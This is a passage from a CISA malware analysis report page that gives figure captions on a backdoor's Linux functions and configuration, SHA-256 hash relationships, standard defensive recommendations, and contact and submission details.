<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%209.jpg?itok=xAi2pFrr" width="600" height="118" alt="Figure 9" /></div>
  </figure><p><strong>Figure 9. - </strong>Depicts the Linux function 'fork.'</p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%2010.jpg?itok=70DSncLG" width="600" height="465" alt="Figure 10" /></div>
  </figure><p><strong>Figure 10. - </strong>Depicts the initialization of a connection using the Berkeley Sockets API.</p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%2011.jpg?itok=UJbtWBNb" width="600" height="333" alt="Figure 11" /></div>
  </figure><p><strong>Figure 11. - </strong>Pane 1 shows configuration settings for the BSMTP daemon, not in the malware. Pane 2 shows part of that configuration in the malware.</p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%2012.jpg?itok=JJohF63k" width="600" height="305" alt="Figure 12" /></div>
  </figure><p><strong>Figure 12. - </strong>Pane 1 shows the Linux functions 'snprintf_chk' and 'system.' Pane 2 shows configuration settings, for the BSMTP daemon.</p>
<h3>Relationship Summary</h3>
<table><tbody><tr><td>6dd8de093e...</td>
<td>Contains</td>
<td>81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab</td>
</tr><tr><td>6dd8de093e...</td>
<td>Contains</td>
<td>bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a</td>
</tr><tr><td>bbbae0455f...</td>
<td>Contained_Within</td>
<td>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0</td>
</tr><tr><td>81cf3b162a...</td>
<td>Contained_Within</td>
<td>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0</td>
</tr></tbody></table><h3>Recommendations</h3>
<p>CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.</p>
<ul><li>Maintain up-to-date antivirus signatures and engines.</li>
<li>Keep operating system patches up-to-date.</li>
<li>Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.</li>
<li>Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.</li>
<li>Enforce a strong password policy and implement regular password changes.</li>
<li>Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.</li>
<li>Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.</li>
<li>Disable unnecessary services on agency workstations and servers.</li>
<li>Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).</li>
<li>Monitor users' web browsing habits; restrict access to sites with unfavorable content.</li>
<li>Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).</li>
<li>Scan all software downloaded from the Internet prior to executing.</li>
<li>Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).</li>
</ul><p>Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, <strong>"Guide to Malware Incident Prevention &amp; Handling for Desktops and Laptops".</strong></p>
<h3>Contact Information</h3>
<ul><li>1-888-282-0870</li>
<li><a href="mailto:CISAservicedesk@cisa.dhs.gov">CISA Service Desk</a> (UNCLASS)</li>
<li><a href="mailto:NCCIC@dhs.sgov.gov">CISA SIPR</a> (SIPRNET)</li>
<li><a href="mailto:NCCIC@dhs.ic.gov">CISA IC</a> (JWICS)</li>
</ul><p>CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: <a href="https://us-cert.cisa.gov/forms/feedback/">https://us-cert.cisa.gov/forms/feedback/</a></p>
<h3>Document FAQ</h3>
<p><strong>What is a MIFR?</strong> A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.</p>
<p><strong>What is a MAR?</strong> A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.</p>
<p><strong>Can I edit this document?</strong> This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or <a href="mailto:CISAservicedesk@cisa.dhs.gov">CISA Service Desk</a>.</p>
<p><strong>Can I submit malware to CISA?</strong> Malware samples can be submitted via three methods:</p>
<ul><li>Web: <a href="https://malware.us-cert.gov">https://malware.us-cert.gov</a></li>
<li>E-Mail: <a href="mailto:submit@malware.us-cert.gov">submit@malware.us-cert.gov</a></li>
<li>FTP: ftp.malware.us-cert.gov (anonymous)</li>
</ul><p>CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at <a href="http://www.cisa.gov">www.cisa.gov</a>.</p>
<h3>Acknowledgments</h3>
<p>Mandiant contributed to this report.</p>
</td>
</tr></tbody><tfoot><tr><td> </td>
</tr></tfoot></table>
      </div>

  
      </div>
  </div>
      <div class="l-constrain l-page-section--rich-text">
        <div class="l-page-section__content">
          




<div  class="c-field c-field--name-body c-field--type-text-with-summary c-field--label-hidden">
  <div class="c-field__content"><p>This product is provided subject to this <a href="/notification" rel="nofollow noopener" target="_blank" title="Follow link">Notification</a> and this <a href="/privacy-policy" rel="nofollow noopener" target="_blank" title="Follow link">Privacy &amp; Use</a> policy.</p></div></div>

        </div>
      </div>
            </div>
        <div class="l-full__footer">
                              
<div class="l-constrain">
  <div class="l-page-section--rich-text">
    <div class="l-page-section__content">
      <div  class="c-product-survey l-page-section--tags l-page-section--rich-text">
        <div class="c-product-survey__top-bar"></div>
        <div class="c-product-survey__content-area">
          <div class="c-product-survey__icon"></div>
          <div class="c-product-survey__text-area">
            <h2>Please share your thoughts</h2>
            <p>We recently updated our anonymous <a href="https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://www.cisa.gov/news-events/analysis-reports/ar23-209a">product survey</a>; we’d welcome your feedback.</p>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>
          

  

<div  class="c-view c-view--detail-page-related-content c-view--display-block_2 view js-view-dom-id-c74d030d43cfd3aef011a01b5df99bf9b257f33e13a98384599706c8a74bac84 c-collection c-collection--blue c-collection--two-column">
  <div class="l-constrain">
    <div class="c-collection__row">
              <div class="c-collection__content">
                      <h2 class="c-collection__title"><span class="c-collection__title-wrap">Related Advisories</span></h2>
                                      </div>
                  <div class="c-collection__cards">
        



      



<article  role="article" class="is-promoted c-teaser c-teaser--horizontal" role="article">
  <div class="c-teaser__row">
        <div class="c-teaser__content">
              <div class="c-teaser__eyebrow">
                      <div class="c-teaser__date"><time datetime="2023-08-09T12:00:00Z">Aug 09, 2023</time>
</div>
                                <div class="c-teaser__meta">Analysis Report | AR23-221A</div>
                  </div>
            <h3 class="c-teaser__title">
        <a href="/news-events/analysis-reports/ar23-221a" target="_self">          
<span>MAR-10454006.r4.v2 SEASPY and WHIRLPOOL Backdoors</span>

        </a>      </h3>
          </div>
  </div>
</article>


        



<article  role="article" class="is-promoted c-teaser c-teaser--horizontal" role="article">
  <div class="c-teaser__row">
        <div class="c-teaser__content">
              <div class="c-teaser__eyebrow">
                      <div class="c-teaser__date"><time datetime="2023-07-28T12:00:00Z">Jul 28, 2023</time>
</div>
                                <div class="c-teaser__meta">Analysis Report | AR23-209C</div>
                  </div>
            <h3 class="c-teaser__title">
        <a href="/news-events/analysis-reports/ar23-209c" target="_self">          
<span>MAR-10454006-r3.v1 Exploit Payload Backdoor </span>

        </a>      </h3>
          </div>
  </div>
</article>


        



<article  role="article" class="is-promoted c-teaser c-teaser--horizontal" role="article">
  <div class="c-teaser__row">
        <div class="c-teaser__content">
              <div class="c-teaser__eyebrow">
                      <div class="c-teaser__date"><time datetime="2023-07-28T12:00:00Z">Jul 28, 2023</time>
</div>
                                <div class="c-teaser__meta">Analysis Report | AR23-209B</div>
                  </div>
            <h3 class="c-teaser__title">
        <a href="/news-events/analysis-reports/ar23-209b" target="_self">          
<span>MAR-10454006-r2.v1 SEASPY Backdoor </span>

        </a>      </h3>
          </div>
  </div>
</article>


        



<article  role="article" class="is-promoted c-teaser c-teaser--horizontal" role="article">
  <div class="c-teaser__row">
        <div class="c-teaser__content">
              <div class="c-teaser__eyebrow">
                      <div class="c-teaser__date"><time datetime="2023-07-06T12:00:00Z">Jul 06, 2023</time>
</div>
                                <div class="c-teaser__meta">Analysis Report | AR23-187A</div>
                  </div>
            <h3 class="c-teaser__title">
        <a href="/news-events/analysis-reports/ar23-187a" target="_self">          
<span>MAR-10445155-1.v1 Truebot Activity Infects U.S. and Canada Based Networks</span>

        </a>      </h3>
          </div>
  </div>
</article>


  
      </div>
    </div>
          </div>
</div>


          </div>
  </div>
  
  
  
  

      </div>

  
  </main>

  

<footer  class="usa-footer usa-footer--slim" role="contentinfo">
    <div class="usa-footer__return-to-top">
    <div class="l-constrain">
      <a href="#">Return to top</a>
    </div>
  </div>
    <div class="usa-footer__upper">
    <div class="l-constrain">
      







  
  
    

  
            

                                <ul  class="c-menu c-menu--footer-main">
        
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="/topics" class="c-menu__link js-top-level" aria-current="false" data-drupal-link-system-path="node/7329">Topics</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="/spotlight" class="c-menu__link js-top-level" aria-current="false" data-drupal-link-system-path="node/7330">Spotlight</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="/resources-tools" class="c-menu__link js-top-level" aria-current="false" data-drupal-link-system-path="node/7331">Resources &amp; Tools</a>
                        </li>
    
                                            
                                                    
      
      
      <li  class="c-menu__item is-active-trail">
                              <a href="/news-events" class="c-menu__link js-top-level is-active-trail" aria-current="false" data-drupal-link-system-path="node/7332">News &amp; Events</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="/careers" class="c-menu__link js-top-level" aria-current="false" data-drupal-link-system-path="node/7323">Careers</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="/about" class="c-menu__link js-top-level" aria-current="false" data-drupal-link-system-path="node/6944">About</a>
                        </li>
        </ul>
  

  
  
  
  

    </div>
  </div>
    <div class="usa-footer__main">
    <div class="l-constrain">
      <div class="usa-footer__main-row">
        <div class="usa-footer__brand">
          
<a  class="c-site-name c-site-name--footer" href="/" rel="home" title="Go to the Cybersecurity & Infrastructure Security Agency homepage">
  <span class="c-site-name__text">Cybersecurity &amp; Infrastructure Security Agency</span>
</a>        </div>
        <div class="usa-footer__contact">
                      

                                <ul  class="c-menu c-menu--social">
        
                                            
                                                            
      
      
      <li  class="c-menu__item">
                              <a href="https://www.facebook.com/CISA" class="c-menu__link--facebook c-menu__link js-top-level" aria-current="false">Facebook</a>
                        </li>
    
                                            
                                                            
      
      
      <li  class="c-menu__item">
                              <a href="https://twitter.com/CISAgov" class="c-menu__link--twitter c-menu__link js-top-level" aria-current="false">Twitter</a>
                        </li>
    
                                            
                                                            
      
      
      <li  class="c-menu__item">
                              <a href="https://www.linkedin.com/company/cybersecurity-and-infrastructure-security-agency" class="c-menu__link--linkedin c-menu__link js-top-level" aria-current="false">LinkedIn</a>
                        </li>
    
                                            
                                                            
      
      
      <li  class="c-menu__item">
                              <a href="https://www.youtube.com/@cisagov" class="c-menu__link--youtube c-menu__link js-top-level" aria-current="false">YouTube</a>
                        </li>
    
                                            
                                                            
      
      
      <li  class="c-menu__item">
                              <a href="https://www.instagram.com/cisagov" class="c-menu__link--instagram c-menu__link js-top-level" aria-current="false">Instagram</a>
                        </li>
    
                                            
                                                            
      
      
      <li  class="c-menu__item">
                              <a href="/subscribe-updates-cisa" class="c-menu__link--rss c-menu__link js-top-level" aria-current="false">RSS</a>
                        </li>
        </ul>
  

                    <div class="usa-footer__contact-info">
            <span>CISA Central</span>
            <a href="tel:8882820870">888-282-0870</a>
            <a href="mailto:central@cisa.dhs.gov">Central@cisa.dhs.gov</a>
          </div>
        </div>
      </div>
    </div>
  </div>
    <div class="usa-footer__lower">
    <div class="l-constrain">
      <div class="usa-footer__lower-row">
        <div class="usa-footer__lower-left">
          
<div  class="c-dhs-logo">
  <div class="c-dhs-logo__seal">DHS Seal</div>
  <div class="c-dhs-logo__content">
    <div class="c-dhs-logo__url">CISA.gov</div>
    <div class="c-dhs-logo__text">An official website of the U.S. Department of Homeland Security</div>
  </div>
</div>                      


                                <ul  class="c-menu c-menu--footer">
        
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="/about" class="c-menu__link js-top-level" title="About CISA" aria-current="false" data-drupal-link-system-path="node/6944">About CISA</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="https://www.dhs.gov/accessibility" class="c-menu__link js-top-level" title="Accessibility" aria-current="false">Accessibility</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="https://www.dhs.gov/performance-financial-reports" class="c-menu__link js-top-level" title="Budget and Performance" aria-current="false">Budget and Performance</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="https://www.dhs.gov" title="Department of Homeland Security" class="c-menu__link js-top-level" aria-current="false">DHS.gov</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="https://www.dhs.gov/foia" class="c-menu__link js-top-level" title="FOIA Requests" aria-current="false">FOIA Requests</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="/cisa-no-fear-act-reporting" title="No FEAR Act Reporting" class="c-menu__link js-top-level" aria-current="false">No FEAR Act</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="https://www.oig.dhs.gov/" class="c-menu__link js-top-level" title="Office of Inspector General" aria-current="false">Office of Inspector General</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="/privacy-policy" class="c-menu__link js-top-level" title="Privacy Policy" aria-current="false" data-drupal-link-system-path="node/16115">Privacy Policy</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_138" title="Subscribe to Email Updates" class="c-menu__link js-top-level" aria-current="false">Subscribe</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="https://www.whitehouse.gov/" class="c-menu__link js-top-level" title="The White House" aria-current="false">The White House</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="https://www.usa.gov/" class="c-menu__link js-top-level" title="USA.gov" aria-current="false">USA.gov</a>
                        </li>
    
                                            
                              
      
      
      <li  class="c-menu__item">
                              <a href="/forms/feedback" title="Website Feedback" class="c-menu__link js-top-level" aria-current="false" data-drupal-link-system-path="forms/feedback">Website Feedback</a>
                        </li>
        </ul>
  

                  </div>
        <div class="usa-footer__lower-right">
          <iframe
            src="https://www.dhs.gov/ntas/"
            name="National Terrorism Advisory System"
            title="National Terrorism Advisory System"
            width="170"
            height="180"
            scrolling="no"
            frameborder="0"
            seamless border="0"
          ></iframe>
        </div>
      </div>
    </div>
  </div>
</footer>


</div>

  </div>

    
        <script type="application/json" data-drupal-selector="drupal-settings-json">{"path":{"baseUrl":"\/","scriptPath":null,"pathPrefix":"","currentPath":"node\/18536","currentPathIsAdmin":false,"isFront":false,"currentLanguage":"en"},"pluralDelimiter":"\u0003","suppressDeprecationErrors":true,"google_analytics":{"account":"G-9MDR73GM0K","trackOutbound":true,"trackMailto":true,"trackTel":true,"trackDownload":true,"trackDownloadExtensions":"7z|aac|arc|arj|asf|asx|avi|bin|csv|doc(x|m)?|dot(x|m)?|exe|flv|gif|gz|gzip|hqx|jar|jpe?g|js|mp(2|3|4|e?g)|mov(ie)?|msi|msp|pdf|phps|png|ppt(x|m)?|pot(x|m)?|pps(x|m)?|ppam|sld(x|m)?|thmx|qtm?|ra(m|r)?|sea|sit|tar|tgz|torrent|txt|wav|wma|wmv|wpd|xls(x|m|b)?|xlt(x|m)|xlam|xml|z|zip"},"data":{"extlink":{"extTarget":false,"extTargetNoOverride":false,"extNofollow":false,"extNoreferrer":false,"extFollowNoOverride":false,"extClass":"ext","extLabel":"(link is external)","extImgClass":false,"extSubdomains":true,"extExclude":"(.\\.gov$)|(.\\.mil$)|(.\\.mil\/)|(.\\.gov\/)","extInclude":"","extCssExclude":".c-menu--social,.c-menu--footer,.c-social-links,.c-text-cta--button","extCssExplicit":"","extAlert":true,"extAlertText":"You are now leaving an official website of the United State Government (USG), the Department of Homeland Security (DHS) and the Cybersecurity and Infrastructure Security Agency (CISA). Links to non-USG, non-DHS and non-CISA sites are provided for the visitor\u0027s convenience and do not represent an endorsement by USG, DHS or CISA of any commercial or private issues, products or services. Note that the privacy policy of the linked site may differ from that of USG, DHS and CISA.","mailtoClass":"mailto","mailtoLabel":"(link sends email)","extUseFontAwesome":false,"extIconPlacement":"append","extFaLinkClasses":"fa fa-external-link","extFaMailtoClasses":"fa fa-envelope-o","whitelistedDomains":[]}},"ckeditorAccordion":{"accordionStyle":{"collapseAll":1,"keepRowsOpen":0}},"user":{"uid":0,"permissionsHash":"2e28e3d4cecae698758a87360e5c783a3a6bbf12a454265e787234af3fdfaba5"}}</script>
<script src="/core/assets/vendor/jquery/jquery.min.js?v=3.6.3"></script>
<script src="/core/misc/polyfills/element.matches.js?v=9.5.10"></script>
<script src="/core/misc/polyfills/object.assign.js?v=9.5.10"></script>
<script src="/core/assets/vendor/once/once.min.js?v=1.0.1"></script>
<script src="/core/assets/vendor/jquery-once/jquery.once.min.js?v=2.2.3"></script>
<script src="/core/misc/drupalSettingsLoader.js?v=9.5.10"></script>
<script src="/core/misc/drupal.js?v=9.5.10"></script>
<script src="/core/misc/drupal.init.js?v=9.5.10"></script>
<script src="/modules/contrib/google_analytics/js/google_analytics.js?v=9.5.10"></script>
<script src="/profiles/cisad8_gov/themes/custom/gesso/dist/js/common.js?ryttwc"></script>
<script src="/profiles/cisad8_gov/themes/custom/gesso/dist/js/uswds-init.es6.js?ryttwc"></script>
<script src="/profiles/cisad8_gov/themes/custom/gesso/dist/js/uswds.es6.js?ryttwc"></script>
<script src="https://dap.digitalgov.gov/Universal-Federated-Analytics-Min.js?" id="_fed_an_ua_tag"></script>
<script src="/modules/contrib/extlink/extlink.js?v=9.5.10"></script>
<script src="/core/misc/jquery.once.bc.js?v=9.5.10"></script>
<script src="/modules/contrib/ckeditor_accordion/js/ckeditor-accordion.js?v=1.x"></script>
<script src="/modules/contrib/responsive_tables_filter/js/tablesaw.min.js?v=1.x"></script>
<script src="/modules/contrib/responsive_tables_filter/js/tablesaw-init.js?v=1.x"></script>
<script src="/modules/contrib/responsive_tables_filter/js/Drupal/ajaxComplete.js?v=1.x"></script>
<script src="/modules/contrib/responsive_tables_filter/js/customizations.js?v=1.x"></script>

  </body>
</html>
